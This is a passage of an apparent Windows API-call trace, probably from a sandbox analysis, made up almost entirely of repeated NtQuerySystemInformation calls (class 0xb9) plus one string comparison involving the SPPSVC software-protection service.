(SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0288.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.382] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cba0, Length=0x28, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.383] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca10, Length=0x20, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207c990, Length=0x20, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.386] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.387] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca80, Length=0x20, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.388] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x38, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cb00, Length=0x20, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.389] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ca90, Length=0x20, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.390] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cff8, Length=0x50, ResultLength=0x0) [0288.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.391] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.393] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd50, Length=0x28, ResultLength=0x0) [0288.394] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdc0, Length=0x28, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.395] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0288.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.399] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce40, Length=0x28, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.400] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd20, Length=0x20, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cf20, Length=0x38, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cda0, Length=0x20, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.401] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cd30, Length=0x20, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.402] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cea0, Length=0x50, ResultLength=0x0) [0288.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.403] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.406] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.407] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc00, Length=0x28, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc70, Length=0x28, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.408] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccf0, Length=0x28, ResultLength=0x0) [0288.412] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbd0, Length=0x20, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.413] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdd0, Length=0x38, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x20, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.414] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x20, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.415] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0288.415] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ce88, Length=0x50, ResultLength=0x0) [0288.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.416] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.419] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbe0, Length=0x28, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc50, Length=0x28, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.420] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.421] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.425] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207ccd0, Length=0x28, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.426] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbb0, Length=0x20, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cdb0, Length=0x38, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cc30, Length=0x20, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.427] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207cbc0, Length=0x20, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.428] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.429] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d220, Length=0x50, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0288.430] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xa78207d110, Length=0x50, ResultLength=0x0) [0288.430] 